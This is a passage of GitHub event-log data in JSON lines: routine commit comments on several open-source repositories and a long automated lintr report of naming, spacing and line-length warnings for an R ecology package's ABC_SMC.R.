{"id":"4580584424","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":19072166,"position":null,"line":null,"path":null,"commit_id":"b9fe39a26e8811d47c51736508cfc6efaffc1053","created_at":"2016-09-18T20:37:39Z","updated_at":"2016-09-18T20:37:39Z","body":":+1:\r\nI didn't add the checkmark, right?"}},"created_at":"2016-09-18T20:37:39Z"}
{"id":"4580584625","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19072167,"position":null,"line":null,"path":null,"commit_id":"3fe047f08f12ac922e5486284a2f2254670cd9a9","created_at":"2016-09-18T20:37:48Z","updated_at":"2016-09-18T20:37:48Z","body":"@dpgeorge : D'oh. I did basic webrepl test as usual with this change, but if you see something weird, well, you know where to look ;-). ets_post() return value is usually not checked, but sometimes it is. We don't use those code paths, but if we start, it can be quite a kaboom.\r\n"}},"created_at":"2016-09-18T20:37:48Z"}
{"id":"4580584853","type":"CommitCommentEvent","actor":{"login":"obidniakv"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19072168,"position":13,"line":46,"path":"src/main/java/com/softserverinc/edu/controllers/ReleaseController.java","commit_id":"1f304066e57c4ba8c554da817c01da3549242848","created_at":"2016-09-18T20:37:58Z","updated_at":"2016-09-18T20:37:58Z","body":"Ok"}},"created_at":"2016-09-18T20:37:58Z"}
{"id":"4580585780","type":"CommitCommentEvent","actor":{"login":"OutdatedVersion"},"repo":{"name":"OutdatedVersion/silent-tnt"},"payload":{"comment":{"id":19072171,"position":75,"line":75,"path":"src/main/java/com/outdatedversion/TNTHandler.java","commit_id":"b59ca325666c7ef212afe6c681dc00c5bb79e160","created_at":"2016-09-18T20:38:36Z","updated_at":"2016-09-18T20:38:36Z","body":"probably a better way. ty @WesJD\r\n![1fc64348169d9a110731596cb9ece89b](https://cloud.githubusercontent.com/assets/11138610/18618918/e2fc8854-7db5-11e6-8bc6-b300c30e9c31.png)\r\n"}},"created_at":"2016-09-18T20:38:36Z"}
{"id":"4580586576","type":"CommitCommentEvent","actor":{"login":"obidniakv"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19072173,"position":4,"line":99,"path":"src/main/java/com/softserverinc/edu/controllers/IssueController.java","commit_id":"648c2fe6f91639473063cfabb3917df7ac21b8b7","created_at":"2016-09-18T20:39:12Z","updated_at":"2016-09-18T20:39:12Z","body":"Ok, I`ll refactor them."}},"created_at":"2016-09-18T20:39:12Z"}
{"id":"4580586810","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":19072174,"position":null,"line":null,"path":null,"commit_id":"032c084a4d2d58f9c8545e6d92ea6990a555ca6d","created_at":"2016-09-18T20:39:21Z","updated_at":"2016-09-18T20:39:21Z","body":"Very cool! I like it!"}},"created_at":"2016-09-18T20:39:21Z"}
{"id":"4580586821","type":"CommitCommentEvent","actor":{"login":"obidniakv"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19072175,"position":4,"line":80,"path":"src/main/java/com/softserverinc/edu/services/IssueService.java","commit_id":"50f1d730231f1f57cafbc601c69c742a1b1f421f","created_at":"2016-09-18T20:39:22Z","updated_at":"2016-09-18T20:39:22Z","body":"Ok."}},"created_at":"2016-09-18T20:39:22Z"}
{"id":"4580587647","type":"CommitCommentEvent","actor":{"login":"obidniakv"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19072176,"position":24,"line":89,"path":"src/main/webapp/WEB-INF/views/release/release.jsp","commit_id":"d8a27bdba889800b5c5d3be4bc29bb5db155355a","created_at":"2016-09-18T20:39:52Z","updated_at":"2016-09-18T20:39:52Z","body":"Ok"}},"created_at":"2016-09-18T20:39:52Z"}
{"id":"4580588575","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":19072180,"position":null,"line":null,"path":null,"commit_id":"227ee9d84d390f37c28dfe43ceda308c6083b1f6","created_at":"2016-09-18T20:40:28Z","updated_at":"2016-09-18T20:40:28Z","body":"Please wrap at 72\r\nhttps://github.com/curl/curl/wiki/push-access-guidelines#commit-style----its-not-a-suggestion\r\n"}},"created_at":"2016-09-18T20:40:28Z"}
{"id":"4580588676","type":"CommitCommentEvent","actor":{"login":"nin-jin"},"repo":{"name":"eigenmethod/mol"},"payload":{"comment":{"id":19072184,"position":null,"line":null,"path":null,"commit_id":"d34c53ed79dafceeb1213af29e5bd0e5580796e7","created_at":"2016-09-18T20:40:32Z","updated_at":"2016-09-18T20:40:32Z","body":"Минимальный зипованный бандл - 10кб. Правда там много лишнего, думаю до 5кб вполне реально ужать."}},"created_at":"2016-09-18T20:40:32Z"}
{"id":"4580588804","type":"CommitCommentEvent","actor":{"login":"steida"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19072185,"position":null,"line":null,"path":null,"commit_id":"a533fbc08be365dd70880b42fa62cc2e6d20b232","created_at":"2016-09-18T20:40:37Z","updated_at":"2016-09-18T20:40:37Z","body":"It is. But I maintain the sane subset ;) https://github.com/este/este/blob/master/.eslintrc#L13"}},"created_at":"2016-09-18T20:40:37Z"}
{"id":"4580591021","type":"CommitCommentEvent","actor":{"login":"OleksandrStino"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19072190,"position":4,"line":18,"path":"src/main/webapp/WEB-INF/layouts/header.jsp","commit_id":"54a602bc64ef98d74fe45cedb848b5ba5c7ed17f","created_at":"2016-09-18T20:41:53Z","updated_at":"2016-09-18T20:41:53Z","body":"it works, thanks"}},"created_at":"2016-09-18T20:41:53Z"}
{"id":"4580591087","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19072191,"position":null,"line":null,"path":null,"commit_id":"be4a45a496048d216670492c58e3829f8cd5b1a0","created_at":"2016-09-18T20:41:53Z","updated_at":"2016-09-18T20:41:53Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:92:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:95:16:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:102:15:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:3:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:25:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:120:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:125:11:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:125:31:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n                              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:29:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:35:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:159:45:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:159:55:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L188) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L188) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L190) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L195) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L196) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:197:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L197) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L200) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L205) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:27:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:211:18:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        